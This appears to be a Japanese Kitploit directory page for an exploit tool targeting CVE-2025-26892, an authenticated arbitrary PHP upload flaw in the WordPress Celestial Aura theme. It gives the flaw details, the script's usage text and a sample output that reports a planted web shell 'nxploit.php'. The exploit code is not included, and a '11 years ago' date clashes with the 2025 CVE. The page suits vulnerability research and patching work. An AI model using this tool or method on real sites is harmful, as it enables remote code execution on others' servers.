Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-26892 — WordPress Celestial Aura Theme <= 2.2 は任意ファイルアップロードの脆弱性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-26892
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-26892

CVE-2025-26892

WordPress Celestial Aura Theme <= 2.2 は任意ファイルアップロードの脆弱性があります。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-26892 – WordPress Celestial Aura テーマ <= 2.2 任意ファイルアップロード (認証済み)

📄 説明

WordPress テーマ Celestial Aura (dkszone 開発) バージョン 2.2 以前には、制限のないファイルアップロード の脆弱性が存在します。
低権限の認証済みユーザーが、テーマの管理パネルを通じて任意の PHP ファイルをアップロードでき、リモートコード実行 (RCE) につながる可能性があります。

  • 影響を受けるテーマ: Celestial Aura
  • 影響を受けるバージョン: ≤ 2.2
  • 脆弱なファイル: wp-admin/admin.php?page=CA-settings
  • 攻撃可能なユーザー: 任意の認証済みユーザー (購読者以上)
  • nonce、ファイルタイプ、拡張子の検証なし

🛡️ CVSS スコア

Patchstack CNA 評価:

  • ベーススコア: 9.9 (CRITICAL)
  • ベクター: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

🚀 使用方法

root@kitploit:~
usage: CVE-2025-26892.py [-h] --url URL --username USERNAME --password PASSWORD

CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated)

options:
  -h, --help            Show this help message and exit
  --url, -u URL         Target WordPress site (e.g., http://127.0.0.1/wordpress)
  --username, -un       WordPress username (any authenticated user)
  --password, -p        WordPress password

このスクリプトは、指定された認証情報でログインし、脆弱なテーマ設定を介して悪意のある PHP シェル (nxploit.php) をアップロードし、アップロードされたシェルへの直接 URL を出力します。

✅ エクスプロイト成功時の出力

root@kitploit:~
[+] Exploit sent successfully.

[+] Form Fields Sent:
  - CA_hdrimage: yes
  ...
  - CA_save: Save changes

[+] Shell Location:
http://target-site/wp-content/uploads/nxploit.php

Exploit By: Khaled_alenazi (Nxploited)

⚠️ 免責事項

このプロジェクトは、教育および許可されたペネトレーションテスト の目的のみを対象としています。
このツールの誤用について、作者は一切の責任を負いません。

ツールをダウンロード